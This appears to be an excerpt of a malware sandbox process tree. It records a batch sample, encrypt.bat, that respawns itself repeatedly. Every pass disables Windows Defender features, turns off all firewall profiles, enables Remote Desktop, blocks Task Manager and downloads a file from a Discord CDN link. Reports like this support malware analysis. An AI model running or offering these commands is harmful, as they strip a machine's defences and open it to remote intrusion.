C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵PID:4768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:4816
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:2812
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:516
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:4804
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:2268
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:4804
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵PID:4080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵PID:3624
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵PID:4144
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵
- Modifies Windows Firewall
PID:1692
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵PID:764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵
- Command and Scripting Interpreter: PowerShell
PID:3680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:1708
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:4760
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:4436
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:4740
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:1476
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵PID:3868
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵PID:3676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵
- Modifies Windows Firewall
PID:3504
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵PID:4868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵
- Modifies Windows Firewall
PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:1844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:3744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Command and Scripting Interpreter: PowerShell
PID:3716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:516
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:4164
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:3028
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:3108
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:3316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:3624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵PID:3316
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵PID:488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵PID:3156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:1568
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵PID:692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:4336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:4080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵PID:1948
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵PID:708
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:1352
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:2640
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:4108
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:1844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:4908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:4044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:96
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:2936
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵PID:344
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵PID:2892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵PID:4804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵PID:360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵
- Modifies Windows Firewall
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:4948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:1348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
PID:1340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4872 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:396
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:3876
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:4968
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:2928
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:8
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:4268
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵PID:708
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵PID:4336
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵PID:3504
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵
- Modifies Windows Firewall
PID:764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵PID:488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:1120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:3676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
PID:2756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵
- Command and Scripting Interpreter: PowerShell
PID:3020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:2200
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:4388
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:2940
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:3796
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:2940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:2336
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵PID:4272
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵
- Modifies Windows Firewall
PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵PID:4968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵PID:392
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵PID:3868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵
- Modifies Windows Firewall
PID:4328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:1568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:2980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵
- Blocklisted process makes network request
PID:4148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵
- Command and Scripting Interpreter: PowerShell
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:164
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:1704
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:2292
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:920
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵PID:2888
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵PID:2948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵PID:4560
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵PID:3708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵
- Modifies Windows Firewall
PID:4452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵PID:2200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵PID:3680
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:380
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:3744
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:648
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:4436
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:4280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:3392
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵
- Modifies Windows Firewall
PID:2640
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵PID:3316
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵PID:1476
-
-
